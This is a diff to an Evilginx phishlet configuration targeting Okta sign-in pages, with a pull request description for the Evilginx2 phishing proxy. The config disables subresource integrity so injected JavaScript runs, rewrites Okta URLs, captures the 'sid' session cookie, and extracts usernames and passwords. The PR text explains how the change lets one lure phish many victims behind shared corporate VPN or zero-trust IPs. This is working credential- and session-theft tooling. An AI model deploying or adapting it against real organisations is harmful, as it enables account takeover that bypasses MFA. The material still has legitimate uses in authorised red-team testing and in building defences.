-  - {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'okta.com', session: true, is_landing: true}
+  # Okta targets can use one the following 2 domains, okta.com and okta-emea.com. Replace <insert-okta-domain-here> with the one that matches your target.
+  - {phish_sub: 'login', orig_sub: 'login', domain: '<insert-okta-domain-here>', session: false, is_landing: false}
+  - {phish_sub: '', orig_sub: '', domain: '<insert-okta-domain-here>', session: false, is_landing: false }
+  - {phish_sub: '<insert-sub-domain-here>', orig_sub: '<insert-sub-domain-here>', domain: '<insert-okta-domain-here>', session: true, is_landing: true}
 sub_filters:
-  - {triggers_on: 'EXAMPLE.okta.com', orig_sub: '', domain: 'EXAMPLE.okta.com', search: 'sha384-.{64}', replace: '', mimes: ['text/html']}
+  # The line below ensures that subresource integrity is disabled so we can update the javascript without issues.
+  - {triggers_on: '<insert-sub-domain-here>.<insert-okta-domain-here>', orig_sub: '', domain: '<insert-sub-domain-here>.<insert-okta-domain-here>', search: 'sha384-.{64}', replace: '', mimes: ['text/html']}
+  # The line below ensures users don't get a 403 after they auth.
+  - {triggers_on: '<insert-sub-domain-here>.<insert-okta-domain-here>', orig_sub: '', domain: '<insert-sub-domain-here>.<insert-okta-domain-here>', search: '\\x2Fuser\\x2Fnotifications', replace: 'https://<insert-sub-domain-here>.<insert-okta-domain-here>\x2Fuser\x2Fnotifications', mimes: ['text/html', 'application/json', 'application/x-javascript', 'text/javascript']}
+  # The line below is needed if your target organization has enabled CORS. If they do, you need to uncomment the following lines and update the values.
+  # Note: if the target uses <insert-okta-domain-here> don't forget to escape the '-' like so:  https\\x3A\\x2F\\x2Fsubdomain.okta\\x2Demea.com  
+  #- {triggers_on: '<insert-sub-domain-here>.<insert-okta-domain-here>', orig_sub: '', domain: '<insert-sub-domain-here>.<insert-okta-domain-here>', search: 'https\\x3A\\x2F\\x2F<insert-sub-domain-here>.<insert-okta-domain-here>', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript', 'text/javascript']}  
 auth_tokens:
-  - domain: 'EXAMPLE.okta.com'
+  - domain: '<insert-sub-domain-here>.<insert-okta-domain-here>'
     keys: ['sid']
 credentials:
   username:
@@ -19,5 +26,5 @@ credentials:
     search: '"password":"([^"]*)'
     type: 'json'
 login:
-  domain: 'EXAMPLE.okta.com'
+  domain: '<insert-sub-domain-here>.<insert-okta-domain-here>'
   path: '/login/login.htm'


### PR DESCRIPTION
…ress

### Summary
update http_proxy.go to handle multiple sessions from the same ip address

### Current Behavior
With the current implementation, if victim B accesses from the same IP address following victim A, Evilginx will not issue a new session properly. This is due to the fact that the implementation unconditionally proxies requests from whitelisted IP addresses in the if statement on line 189.

### Expected Behavior:
Although this implementation is necessary to proxy requests issued by browsers without cookies, a new session should be created each time the initial URL of lures is accessed. Especially when dealing with companies that have VPN or zero-trust solutions (e.g. Zscaler, Akamai EAA) in place, the current implementation requires creating lures for as many people as the number of people to be phished.

Credit: @kawakatz https://github.com/kgretzky/evilginx2/pull/880/commits/b22f0e77e6d420943f680b628b44eeb8169f3b0b